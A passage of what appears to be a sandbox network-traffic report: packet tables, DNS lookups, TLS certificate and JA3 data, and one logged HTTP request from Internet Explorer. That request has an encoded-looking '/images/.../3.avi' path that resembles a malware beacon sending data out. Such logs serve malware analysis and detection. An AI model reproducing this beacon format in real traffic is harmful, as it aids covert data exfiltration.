Nov 19, 2020 09:11:58.334177017 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.334181070 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.334217072 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.334228992 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.334273100 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.334296942 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.334337950 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.334361076 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.334377050 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.334397078 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.334414959 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.334428072 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.334466934 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.334475040 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.334578991 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.336293936 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336338043 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336370945 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.336410046 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.336572886 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336617947 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336642027 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.336667061 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336668015 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.336715937 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336718082 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.336762905 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336786985 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.336802006 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336833954 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336848021 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.336874962 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:11:58.336896896 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.336926937 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:11:58.340424061 CET	443	49747	87.248.118.22	192.168.2.5
Nov 19, 2020 09:12:31.847549915 CET	49765	80	192.168.2.5	143.204.15.203
Nov 19, 2020 09:12:31.847635984 CET	49764	80	192.168.2.5	143.204.15.203
Nov 19, 2020 09:12:31.863607883 CET	80	49764	143.204.15.203	192.168.2.5
Nov 19, 2020 09:12:31.863704920 CET	49764	80	192.168.2.5	143.204.15.203
Nov 19, 2020 09:12:31.863915920 CET	80	49765	143.204.15.203	192.168.2.5
Nov 19, 2020 09:12:31.864882946 CET	49764	80	192.168.2.5	143.204.15.203
Nov 19, 2020 09:12:31.865068913 CET	49765	80	192.168.2.5	143.204.15.203
Nov 19, 2020 09:12:31.880985022 CET	80	49764	143.204.15.203	192.168.2.5
Nov 19, 2020 09:12:32.200747013 CET	80	49764	143.204.15.203	192.168.2.5
Nov 19, 2020 09:12:32.200841904 CET	49764	80	192.168.2.5	143.204.15.203
Nov 19, 2020 09:13:01.880940914 CET	80	49765	143.204.15.203	192.168.2.5
Nov 19, 2020 09:13:01.882153988 CET	49765	80	192.168.2.5	143.204.15.203
Nov 19, 2020 09:13:40.248652935 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:13:40.248739958 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:13:40.248842001 CET	49749	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:13:40.248927116 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:13:40.249051094 CET	49747	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:13:40.249058962 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:13:40.249128103 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:13:40.267853022 CET	443	49749	151.101.1.44	192.168.2.5
Nov 19, 2020 09:13:40.267879963 CET	443	49749	151.101.1.44	192.168.2.5
Nov 19, 2020 09:13:40.267899990 CET	443	49748	151.101.1.44	192.168.2.5
Nov 19, 2020 09:13:40.267915964 CET	443	49748	151.101.1.44	192.168.2.5
Nov 19, 2020 09:13:40.267931938 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:13:40.267946959 CET	443	49745	151.101.2.132	192.168.2.5
Nov 19, 2020 09:13:40.267949104 CET	49749	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:13:40.267962933 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:13:40.267978907 CET	443	49744	151.101.2.132	192.168.2.5
Nov 19, 2020 09:13:40.267997980 CET	443	49750	151.101.1.44	192.168.2.5
Nov 19, 2020 09:13:40.268013954 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:13:40.268023014 CET	49748	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:13:40.268034935 CET	49749	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:13:40.268037081 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:13:40.268037081 CET	443	49750	151.101.1.44	192.168.2.5
Nov 19, 2020 09:13:40.268057108 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:13:40.268090963 CET	49744	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:13:40.268098116 CET	49745	443	192.168.2.5	151.101.2.132
Nov 19, 2020 09:13:40.268114090 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:13:40.268131971 CET	49750	443	192.168.2.5	151.101.1.44
Nov 19, 2020 09:13:40.283652067 CET	443	49746	87.248.118.22	192.168.2.5
Nov 19, 2020 09:13:40.283668995 CET	443	49747	87.248.118.22	192.168.2.5
Nov 19, 2020 09:13:40.283735037 CET	49746	443	192.168.2.5	87.248.118.22
Nov 19, 2020 09:13:40.283863068 CET	49747	443	192.168.2.5	87.248.118.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2020 09:11:47.673595905 CET	49992	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:47.687479973 CET	53	49992	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:50.587318897 CET	60075	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:50.607460022 CET	53	60075	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:50.824240923 CET	55016	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:50.836565018 CET	53	55016	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:51.182116985 CET	64345	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:51.194495916 CET	53	64345	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:51.195086956 CET	57128	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:51.213699102 CET	53	57128	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:53.108733892 CET	54791	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:53.137223959 CET	53	54791	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:53.793190956 CET	50463	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:53.807552099 CET	53	50463	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:54.198590994 CET	50394	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:54.224889994 CET	53	50394	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:54.657196999 CET	58530	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:54.669485092 CET	53	58530	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:55.617620945 CET	53813	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:55.631640911 CET	53	53813	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:56.065828085 CET	63732	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:56.078805923 CET	53	63732	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:56.241601944 CET	57344	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:56.258285046 CET	53	57344	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:56.772305965 CET	54450	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:56.792558908 CET	53	54450	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:57.162822008 CET	59261	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:57.175559044 CET	53	59261	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:57.760122061 CET	57151	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:57.774086952 CET	53	57151	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:58.098392963 CET	59413	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:58.109644890 CET	60516	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:58.115420103 CET	51649	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:58.117944956 CET	53	59413	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:58.123193026 CET	53	60516	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:58.136866093 CET	53	51649	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:58.553467035 CET	65086	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:58.572330952 CET	53	65086	8.8.8.8	192.168.2.5
Nov 19, 2020 09:11:59.111552000 CET	56432	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:11:59.126416922 CET	53	56432	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:08.069479942 CET	52929	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:08.081861973 CET	53	52929	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:08.540091991 CET	64317	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:08.553272963 CET	53	64317	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:10.872749090 CET	61004	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:10.885452986 CET	53	61004	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:11.860141993 CET	56895	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:11.872946978 CET	53	56895	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:17.735318899 CET	62372	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:17.747752905 CET	53	62372	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:18.246443987 CET	61515	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:18.258616924 CET	53	61515	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:18.903981924 CET	62372	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:18.916481018 CET	53	62372	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:19.903119087 CET	62372	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:19.915585041 CET	53	62372	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:20.202100992 CET	56675	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:20.215270996 CET	53	56675	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:21.215003014 CET	56675	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:21.227226973 CET	53	56675	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:21.918951988 CET	62372	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:21.931277990 CET	53	62372	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:22.230281115 CET	56675	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:22.242571115 CET	53	56675	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:24.240642071 CET	56675	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:24.253634930 CET	53	56675	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:25.927298069 CET	62372	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:25.939563036 CET	53	62372	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:28.240874052 CET	56675	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:28.256124020 CET	53	56675	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:30.325156927 CET	57172	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:30.337935925 CET	53	57172	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:30.904674053 CET	55267	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:30.918165922 CET	53	55267	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:31.331474066 CET	50969	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:31.344707966 CET	53	50969	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:31.605711937 CET	64362	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:31.618745089 CET	53	64362	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:31.822007895 CET	54766	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:31.836621046 CET	53	54766	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:32.021521091 CET	61446	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:32.035115004 CET	53	61446	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:32.581218958 CET	57515	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:32.594345093 CET	53	57515	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:32.955591917 CET	58199	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:32.969166994 CET	53	58199	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:33.388688087 CET	65221	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:33.402014017 CET	53	65221	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:33.961606026 CET	61573	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:33.974488020 CET	53	61573	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:34.305444002 CET	56562	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:34.332146883 CET	53	56562	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:34.599409103 CET	53591	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:34.612724066 CET	53	53591	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:36.350214005 CET	59688	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:36.363650084 CET	53	59688	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:36.723236084 CET	56032	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:36.737204075 CET	53	56032	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:40.561908007 CET	61150	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:41.585515976 CET	61150	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:12:42.319914103 CET	53	61150	8.8.8.8	192.168.2.5
Nov 19, 2020 09:12:42.321569920 CET	53	61150	8.8.8.8	192.168.2.5
Nov 19, 2020 09:13:01.405272007 CET	63458	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:13:01.418546915 CET	53	63458	8.8.8.8	192.168.2.5
Nov 19, 2020 09:13:02.401456118 CET	63458	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:13:02.413966894 CET	53	63458	8.8.8.8	192.168.2.5
Nov 19, 2020 09:13:03.404561996 CET	63458	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:13:03.417891026 CET	53	63458	8.8.8.8	192.168.2.5
Nov 19, 2020 09:13:05.409444094 CET	63458	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:13:05.421581984 CET	53	63458	8.8.8.8	192.168.2.5
Nov 19, 2020 09:13:09.419795990 CET	63458	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:13:09.432034016 CET	53	63458	8.8.8.8	192.168.2.5
Nov 19, 2020 09:13:10.986843109 CET	50422	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:13:10.999557972 CET	53	50422	8.8.8.8	192.168.2.5
Nov 19, 2020 09:13:14.258501053 CET	53247	53	192.168.2.5	8.8.8.8
Nov 19, 2020 09:13:14.271229982 CET	53	53247	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 19, 2020 09:11:50.824240923 CET	192.168.2.5	8.8.8.8	0xd467	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:53.108733892 CET	192.168.2.5	8.8.8.8	0x2b06	Standard query (0)	web.vortex.data.msn.com	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:53.793190956 CET	192.168.2.5	8.8.8.8	0x42a7	Standard query (0)	contextual.media.net	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:55.617620945 CET	192.168.2.5	8.8.8.8	0x9ea	Standard query (0)	lg3.media.net	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:56.241601944 CET	192.168.2.5	8.8.8.8	0xf5ee	Standard query (0)	hblg.media.net	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:56.772305965 CET	192.168.2.5	8.8.8.8	0xba81	Standard query (0)	cvision.media.net	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:57.162822008 CET	192.168.2.5	8.8.8.8	0xbc91	Standard query (0)	srtb.msn.com	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.098392963 CET	192.168.2.5	8.8.8.8	0x5fc3	Standard query (0)	zem.outbrainimg.com	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.109644890 CET	192.168.2.5	8.8.8.8	0xb2fd	Standard query (0)	s.yimg.com	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.115420103 CET	192.168.2.5	8.8.8.8	0x1338	Standard query (0)	img.img-taboola.com	A (IP address)	IN (0x0001)
Nov 19, 2020 09:12:31.822007895 CET	192.168.2.5	8.8.8.8	0x3661	Standard query (0)	ocsp.sca1b.amazontrust.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 19, 2020 09:11:50.836565018 CET	8.8.8.8	192.168.2.5	0xd467	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 09:11:53.137223959 CET	8.8.8.8	192.168.2.5	0x2b06	No error (0)	web.vortex.data.msn.com	web.vortex.data.microsoft.com		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 09:11:53.807552099 CET	8.8.8.8	192.168.2.5	0x42a7	No error (0)	contextual.media.net		23.54.113.52	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:55.631640911 CET	8.8.8.8	192.168.2.5	0x9ea	No error (0)	lg3.media.net		23.54.113.52	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:56.258285046 CET	8.8.8.8	192.168.2.5	0xf5ee	No error (0)	hblg.media.net		23.54.113.52	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:56.792558908 CET	8.8.8.8	192.168.2.5	0xba81	No error (0)	cvision.media.net	cvision.media.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 09:11:57.175559044 CET	8.8.8.8	192.168.2.5	0xbc91	No error (0)	srtb.msn.com	www.msn.com		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 09:11:57.175559044 CET	8.8.8.8	192.168.2.5	0xbc91	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 09:11:58.117944956 CET	8.8.8.8	192.168.2.5	0x5fc3	No error (0)	zem.outbrainimg.com	outbrain.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 09:11:58.117944956 CET	8.8.8.8	192.168.2.5	0x5fc3	No error (0)	outbrain.map.fastly.net		151.101.2.132	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.117944956 CET	8.8.8.8	192.168.2.5	0x5fc3	No error (0)	outbrain.map.fastly.net		151.101.66.132	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.117944956 CET	8.8.8.8	192.168.2.5	0x5fc3	No error (0)	outbrain.map.fastly.net		151.101.130.132	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.117944956 CET	8.8.8.8	192.168.2.5	0x5fc3	No error (0)	outbrain.map.fastly.net		151.101.194.132	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.123193026 CET	8.8.8.8	192.168.2.5	0xb2fd	No error (0)	s.yimg.com	edge.gycpi.b.yahoodns.net		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 09:11:58.123193026 CET	8.8.8.8	192.168.2.5	0xb2fd	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.22	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.123193026 CET	8.8.8.8	192.168.2.5	0xb2fd	No error (0)	edge.gycpi.b.yahoodns.net		87.248.118.23	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.136866093 CET	8.8.8.8	192.168.2.5	0x1338	No error (0)	img.img-taboola.com	tls13.taboola.map.fastly.net		CNAME (Canonical name)	IN (0x0001)
Nov 19, 2020 09:11:58.136866093 CET	8.8.8.8	192.168.2.5	0x1338	No error (0)	tls13.taboola.map.fastly.net		151.101.1.44	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.136866093 CET	8.8.8.8	192.168.2.5	0x1338	No error (0)	tls13.taboola.map.fastly.net		151.101.65.44	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.136866093 CET	8.8.8.8	192.168.2.5	0x1338	No error (0)	tls13.taboola.map.fastly.net		151.101.129.44	A (IP address)	IN (0x0001)
Nov 19, 2020 09:11:58.136866093 CET	8.8.8.8	192.168.2.5	0x1338	No error (0)	tls13.taboola.map.fastly.net		151.101.193.44	A (IP address)	IN (0x0001)
Nov 19, 2020 09:12:31.836621046 CET	8.8.8.8	192.168.2.5	0x3661	No error (0)	ocsp.sca1b.amazontrust.com		143.204.15.203	A (IP address)	IN (0x0001)
Nov 19, 2020 09:12:31.836621046 CET	8.8.8.8	192.168.2.5	0x3661	No error (0)	ocsp.sca1b.amazontrust.com		143.204.15.36	A (IP address)	IN (0x0001)
Nov 19, 2020 09:12:31.836621046 CET	8.8.8.8	192.168.2.5	0x3661	No error (0)	ocsp.sca1b.amazontrust.com		143.204.15.47	A (IP address)	IN (0x0001)
Nov 19, 2020 09:12:31.836621046 CET	8.8.8.8	192.168.2.5	0x3661	No error (0)	ocsp.sca1b.amazontrust.com		143.204.15.29	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ocsp.sca1b.amazontrust.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49764	143.204.15.203	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Nov 19, 2020 09:12:31.864882946 CET	3005	OUT	GET /images/ImwSfQzek0TH1PjPRN/U0Aq1rFKx/emeJW4LJI8wrM6MN4_2B/qJPnb8B3BkpX2XpdE2G/V316Jgdov_2BOgw86dBUYu/kkLtVneyvgFhX/UiMN5NKO/xM6hmwPnY5DiFEO8xhkgOsY/OSDkw0Qs/kJpX3kaA4Hvk7/3.avi HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: ocsp.sca1b.amazontrust.com Connection: Keep-Alive
Nov 19, 2020 09:12:32.200747013 CET	3038	IN	HTTP/1.1 200 OK Content-Type: application/ocsp-response Content-Length: 5 Connection: keep-alive Accept-Ranges: bytes Cache-Control: public, max-age=300 Date: Thu, 19 Nov 2020 08:12:32 GMT ETag: "5f4578e9-5" Last-Modified: Tue, 25 Aug 2020 20:47:37 GMT Server: nginx X-Cache: Miss from cloudfront Via: 1.1 1c526e04dcf5c9c6163e62b0bdd963b1.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MXP64-C1 X-Amz-Cf-Id: 85qoSCPGufbTnArXT4MFFUODnVF6kNv4LudC_QIhxi5UXFN06_hnmQ== Data Raw: 30 03 0a 01 06 Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 19, 2020 09:11:58.162776947 CET	151.101.2.132	443	192.168.2.5	49744	CN=*.outbrainimg.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Oct 13 07:57:47 CEST 2020 Thu Mar 17 17:40:46 CET 2016	Mon Jan 11 06:57:47 CET 2021 Wed Mar 17 17:40:46 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.162776947 CET	151.101.2.132	443	192.168.2.5	49744	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.163248062 CET	151.101.2.132	443	192.168.2.5	49745	CN=*.outbrainimg.com CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Oct 13 07:57:47 CEST 2020 Thu Mar 17 17:40:46 CET 2016	Mon Jan 11 06:57:47 CET 2021 Wed Mar 17 17:40:46 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.163248062 CET	151.101.2.132	443	192.168.2.5	49745	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021		9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.182307959 CET	151.101.1.44	443	192.168.2.5	49748	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.182307959 CET	151.101.1.44	443	192.168.2.5	49748	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.184536934 CET	151.101.1.44	443	192.168.2.5	49750	CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Aug 10 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Fri Dec 31 13:00:00 CET 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 19, 2020 09:11:58.184536934 CET	151.101.1.44	443	192.168.2.5	49750	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
